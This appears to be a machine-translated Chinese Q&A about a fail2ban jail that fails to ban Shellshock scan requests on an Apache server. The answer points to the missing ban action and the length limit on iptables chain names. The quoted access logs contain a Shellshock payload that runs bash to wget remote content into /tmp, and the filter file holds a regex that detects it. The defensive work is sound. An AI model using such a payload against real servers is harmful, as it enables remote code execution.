fail2ban 规则未生效

tag-icon tag-icon security iptables fail2ban
fail2ban 规则未生效

我已经在 Ubuntu 14.04 的库存安装上安装了 Apache 网络服务器,并且我正在尝试使用 fail2ban 来阻止检查漏洞的请求。

我已输入以下内容/etc/fail2ban/jail.local

[apache-vulnerability-scan]

enabled  = true
port     = http,https
filter   = apache-vulnerability-scan
logpath  = /var/log/apache*/*access.log
maxretry = 1

该规则的定义如下/etc/fail2ban/filter.d/apache-vulnerability-scan.conf

[Definition]

failregex = ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$

ignoreregex =

对于那些可能不熟悉 Ubuntu 的 fail2ban 默认规则的人来说,一些主要规则如下所示:

ignoreip = 127.0.0.1/8
bantime  = 600
findtime = 600
maxretry = 3
backend = auto
usedns = warn
protocol = tcp
chain = INPUT

maxretry但是,尽管设置为 ,我仍然可以发出请求而 fail2ban 不会禁止我的 IP 1

10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:43 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"

过滤器的状态似乎正常:

# fail2ban-client status apache-vulnerability-scan
Status for the jail: apache-vulnerability-scan
|- filter
|  |- File list:        /var/log/apache2/other_vhosts_access.log /var/log/apache
2/access.log
|  |- Currently failed: 0
|  `- Total failed:     0
`- action
   |- Currently banned: 0
   |  `- IP list:
   `- Total banned:     0

规则本身似乎就是这样的:

Running tests
=============

Use   failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
Use         log file : /var/log/apache2/access.log


Results
=======

Failregex: 10 total
|-  #) [# of hits] regular expression
|   1) [10] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
|      10.0.2.2  Sat Nov 21 00:11:40 2015
|      10.0.2.2  Sat Nov 21 00:11:40 2015
|      10.0.2.2  Sat Nov 21 00:11:40 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:42 2015
|      10.0.2.2  Sat Nov 21 00:11:42 2015
|      10.0.2.2  Sat Nov 21 00:11:43 2015
`-

Ignoreregex: 0 total

Date template hits:
|- [# of hits] date format
|  [13] Day/MONTH/Year:Hour:Minute:Second
|  [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
|  [0] WEEKDAY MONTH Day Hour:Minute:Second Year
|  [0] WEEKDAY MONTH Day Hour:Minute:Second
|  [0] MONTH Day Hour:Minute:Second
|  [0] Year/Month/Day Hour:Minute:Second
|  [0] Day/Month/Year Hour:Minute:Second
|  [0] Day/Month/Year2 Hour:Minute:Second
|  [0] Month/Day/Year:Hour:Minute:Second
|  [0] Year-Month-Day Hour:Minute:Second[,subsecond]
|  [0] Year-Month-Day Hour:Minute:Second
|  [0] Year.Month.Day Hour:Minute:Second
|  [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
|  [0] Day-Month-Year Hour:Minute:Second
|  [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
|  [0] TAI64N
|  [0] Epoch
|  [0] ISO 8601
|  [0] Hour:Minute:Second
|  [0] <Month/Day/Year@Hour:Minute:Second>
|  [0] YearMonthDay Hour:Minute:Second
|  [0] Month-Day-Year Hour:Minute:Second
`-

Lines: 13 lines, 0 ignored, 12 matched, 1 missed
|- Missed line(s):
|  10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"
`-

为什么 fail2ban 规则没有生效?我做错了什么?

答案1

您缺少action所用规则的,这意味着 fail2ban 不知道在规则匹配时该做什么。您可以为每个 jail 全局或本地配置此规则。操作规则定义在/etc/fail2ban/action.d/

例如,对于全局禁令,您可以在中添加以下内容jail.local

banaction = iptables-multiport

请检查jail.conf文件的“操作”区域以获取更多详细信息。

您还需要缩短监狱名称,apache-vulnerability-scan因为 iptables 链名称有长度限制。

相关内容